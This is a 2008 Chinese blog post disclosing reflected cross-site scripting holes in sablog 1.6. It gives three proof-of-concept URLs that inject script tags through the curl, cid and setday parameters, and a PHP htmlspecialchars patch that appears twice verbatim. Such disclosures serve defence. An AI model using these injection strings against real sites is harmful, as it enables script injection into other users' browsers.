订阅
上一篇
返回
下一篇
sablog 1.6 多个跨站漏洞
作者: 天晴无名氏 日期: 2008-03-29 10:44
Author:amxku[c.r.s.t]
Version:sablog 1.6
由于过滤不严,存在多个跨站漏洞
PS:
http://www.amxku.net/?viewmode=list&curl=>"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>
http://www.amxku.net/?action=index&cid=>"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>
http://www.amxku.net/?action=index&setdate=200804&setday=>"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>&page=1
临时解决办法:
在global.php中过滤curl,cid,setday等
$modelink = '';
if ($action) {
$modelink .= '&action='.$action;
}
if ($curl) {
$modelink .= '&curl='.htmlspecialchars($curl);
}
if ($cid) {
$modelink .= '&cid='.htmlspecialchars($cid);
}
if ($setdate) {
$modelink .= '&setdate='.htmlspecialchars($setdate);
}
if ($setday) {
$modelink .= '&setday='.htmlspecialchars($setday);
}
if (intval($_GET['searchid'])) {
$modelink .= '&searchid='.htmlspecialchars($_GET['searchid']);
}
if (intval($_GET['userid'])) {
$modelink .= "&userid=".htmlspecialchars($_GET['userid']);
}
if ($_GET['item']) {
$item = urlencode(addslashes($item));
$modelink .= '&item='.$item;
}
if ($action) {
$modelink .= '&action='.$action;
}
if ($curl) {
$modelink .= '&curl='.htmlspecialchars($curl);
}
if ($cid) {
$modelink .= '&cid='.htmlspecialchars($cid);
}
if ($setdate) {
$modelink .= '&setdate='.htmlspecialchars($setdate);
}
if ($setday) {
$modelink .= '&setday='.htmlspecialchars($setday);
}
if (intval($_GET['searchid'])) {
$modelink .= '&searchid='.htmlspecialchars($_GET['searchid']);
}
if (intval($_GET['userid'])) {
$modelink .= "&userid=".htmlspecialchars($_GET['userid']);
}
if ($_GET['item']) {
$item = urlencode(addslashes($item));
$modelink .= '&item='.$item;
}
引用通告地址:
评论: 0 |
引用: 0 |
阅读: 175
加入网摘
显示Tag关联文章
利用Moto的漏洞刷QQ绿钻 (2008-11-29 18:19)
oblog4.6添加后台管理员漏洞(仅适用于sql版) (2008-09-12 13:20)
万网虚拟机漏洞,拿某VIP木马所有会员 (2008-06-20 00:53)
phpwind管理权限泄露漏洞+利用程序 (2008-06-01 15:23)
最新phpwind管理权限泄露漏洞通杀 (2008-06-01 15:21)
利用sohu网站URL跳转漏洞欺骗邮箱密码 (2008-05-30 16:16)
从ACDSee的漏洞看木马入侵新思路 (2008-04-29 23:02)
Microsoft IE数据流处理远程代码执行漏洞 (2008-04-15 15:48)
oblog4.6添加后台管理员漏洞(仅适用于sql版) (2008-09-12 13:20)
万网虚拟机漏洞,拿某VIP木马所有会员 (2008-06-20 00:53)
phpwind管理权限泄露漏洞+利用程序 (2008-06-01 15:23)
最新phpwind管理权限泄露漏洞通杀 (2008-06-01 15:21)
利用sohu网站URL跳转漏洞欺骗邮箱密码 (2008-05-30 16:16)
从ACDSee的漏洞看木马入侵新思路 (2008-04-29 23:02)
Microsoft IE数据流处理远程代码执行漏洞 (2008-04-15 15:48)
发表评论
